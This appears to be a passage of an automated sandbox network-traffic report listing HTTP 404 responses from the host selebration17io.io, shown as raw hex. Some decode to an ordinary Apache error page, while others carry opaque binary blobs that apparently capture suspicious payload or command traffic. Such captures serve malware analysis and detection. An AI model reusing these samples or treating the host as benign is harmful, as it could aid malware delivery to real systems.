                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 cd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c6 13 dc 19 df 8c ca 70 73 dc 31 bc af 4f ed 7f 40 93 d9 5e 6f 71 00 76 b9 3b 50 fd 96 bf eb bf 3a fc bb c9 27 97 8f c8 d4 60 66 b0 06 bd 89 72 e9 ac 67 f3 40 ee e5 a4 78 ee 09 b5 8f 36 03 cf 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 bd 40 70 b1 5b 23 5c 4a 8a f4 e9 5a 15 21 0b 5a a3 06 93 3a b6 3f c8 01 28 bf 48 15 d7 d9 53 53 fa 79 1a 9e 1d 09 52 2b 05 50 83 7b 7e 55 f7 ff 78 8d 54 db c4 0d 53 13 bf 0e e1 92 24 0a 4f c5 06 a1 ca a1 61 7e de f5 6c b9 18 17 7e 5f af 9a a5 b4 cf a0 c1 bd dd 7a e8 2b 48 19 e2 2c d5 2c 18 1a e5 96 be 35 51 61 9a d4 2e 7c 88 38 c8 48 6b a1 c0 4a 8a 03 fd ec 9e aa 7b ac 87 2f bd 61 81 cf 5c bf ca 34 fd f8 12 8c 35 6c c9 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae cc 95 03 4c 69 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cd 46 e1 4a 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 06 f0 27 38 03 9b c7 9b 4f 06 3d 66 f1 9a 64 b1 1d ee 12 51 8c 74 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 6e a1 54 35 8b fc d3 7a 1b a2 cb 29 37 08 e7 5b 1e 54 aa 1e 26 61 11 ee c3 2c 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 6c 5e ae 43 75 81 7e 90 c7 7d 10 9f 30 1d dc b0 99 37 98 8a cd 70 7a 74 79 ae 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f 30 a0 aa 7a 8f 16 6d e3 cd d2 d9 37 00 12 e5 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 61 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 fd e2 aa 20 e4 7d bc 49 48 2d 47 85 94 be 9b 46 86 20 a9 66 23 81 76 4f ff b3 fb c4 ff 4e 9d 86 ba 69 59 f0 d7 67 f9 f1 3d ca 14 88 78 4d ff 4b 98 02 17 cb 18 1e 93 9d 2e 10 0f 68 45 c7 75 f6 54 e3 30 13 92 8e e3 e0 21 2e 34 ee 64 2d b7 65 14 97 13 04 87 5b f6 ff bb 52 33 8b f8 58 a5 ef c1 7f 3c 8f 08 46 65 b5 83 2b 22 a0 ac 7e fd e6 3a 75 78 2b 04 70 fc 9e 84 8c f2 ce 6b 3d 59 4a 81 1f 37 6e 46 75 bd a6 b3 3a 4e 26 e1 71 e1 70 c3 1f ac 14 c2 06 70 40 64 b6 29 a2 ec 27 01 2f ce 45 e4 15 45 c0 73 cf f4 02 2e ac 93 55 3b 1c a8 38 5f 22 cd 5d ff d4 6d f3 91 c8 7f 51 66 fd db 83 6a fe 51 7a 53 59 92 8e d0 18 96 57 13 d4 6c c1 13 0a 34 4c 53 4d 40 05 50 04 4b 05 a4 38 c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 25 13 ad f3 1b 3a 2f b9 30 bd 08 46 b2 75 0e 31 79 92 90 f7 3f f5 ee c6 79 2a 45 87 d0 32 e3 13 63 71 ba d6 af 31 3c 27 f4 48 b7 9f 33 d9 cc 46 d9 78 0f ac af eb 99 55 3d bf ba 68 92 1e ff 9d 7a 7f 55 40 57 64 7b 39 63 e7 ac 04 28 84 42 40 77 0b dc 9b 84 f7 3d 66 f1 8a 64 b1 1f 30 12 d1 8c 70 07 4b 81 7b df 8e 82 01 f8 e4 1f 4e a1 90 4e a1 54 55 b5 8e b7 1b 6f c3 cb 29 32 28 e7 5b a2 1e b1 1e 5a 7c 11 ee c3 ee 4c a3 f4 1e 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 4d 0b 9f 08 84 d9 b0 c9 35 83 8a 99 e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 b0 f9 1c d9 22 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca ac bb 40 56 eb 96 ce ec e5 8b d9 a7 0d b8 ca d4 5f 09 59 43 9c 45 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 05 7d da c9 ed 9a ac 4e bf 83 09 e8 05 04 1e ac 18 88 6d b3 0e a3 81 19 13 b8 a3 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 05 e1 f0 33 a3 27 b8 99 66 b2 52 dc 7e 28 8b 18 57 41 1b 7d 42 a3 81 96 7f b8 34 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 e2 25 1f b8 4e 4a 43 2d b5 a6 b8 78 46 b2 8e 98 6d 38 45 32 d0 f9 f3 32 42 c2 22 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d 9b 10 54 1a 39 6e 39 36 79 d0 19 5f 57 da 69 f9 e4 09 31 01 6e 91 fd 58 b3 cc 8e 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 82 01 6d 3c d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 34 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1c 86 09 9f 47 c7 f8 01 b5 20 f0 3e 0b 5a 38 fd 29 00 65 98 59 66 1b 7d d7 e2 89 bd cc 6a c1 7e 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 34Uys/~(`:G >Z8)eYf}j~/0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 2d 5b e3 1b 34 c4 f5 72 98 94 0e be 44 07 d2 7d ae b1 4f 5c b8 39 3f 74 3d 05 f0 ff 6c f7 d4 bd 0c de 3e cb 96 df b0 ca 36 50 ca b2 e7 f5 b6 70 ba e2 5f f1 cb a6 da a6 f7 31 22 53 65 7e 3c cd cc ea 2e 28 7e 36 aa db b9 27 2e d5 4e 95 fe 5e bf 6c 13 d9 a5 e2 bf c4 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 5b 53 90 dc 84 fd 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5f db c4 29 11 13 bf 2a 9a 90 24 08 4f c5 a5 b5 cb a1 61 6e de f5 69 f9 1b 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a a4 43 7e 88 2c c8 48 d2 a2 c3 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf e8 f7 1a 54 9b 4a d8 19 fe b1 4d 0b 65 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb ac ce 46 c1 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 24 79 39 ea e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 6d 7c a3 90 4e b1 54 55 a5 aa b5 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 30 18 06 f1 2c 1e ac 03 5b d7 1f e4 a6 55 12 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 1c 0d b9 e2 2b 29 b6 bb 01 64 17 28 d2 f4 44 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 57 90 26 48 c4 3a 96 31 cb e7 17 3f cc 98 7c 4d a4 70 d4 03 93 ae 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 dc a6 a7 5f 29 43 43 51 5c 03 62 18 1a 60 fa 40 a0 ae 88 c1 be a3 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e 6c 36 d5 1e cb 67 f5 e8 19 1f 88 b9 8c f5 28 ea 50 b9 c3 ea 9e 13 6c ba 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 79 42 68 0b 2d 03 81 96 7f dc 2e 27 9d 9f 41 40 56 64 de 9e 73 89 b4 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 be b1 8e 58 43 6a 2d 40 b3 e9 f3 32 72 de 39 16 12 17 76 eb 17 0e 8d e3 51 aa b0 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 51 8f 69 b9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
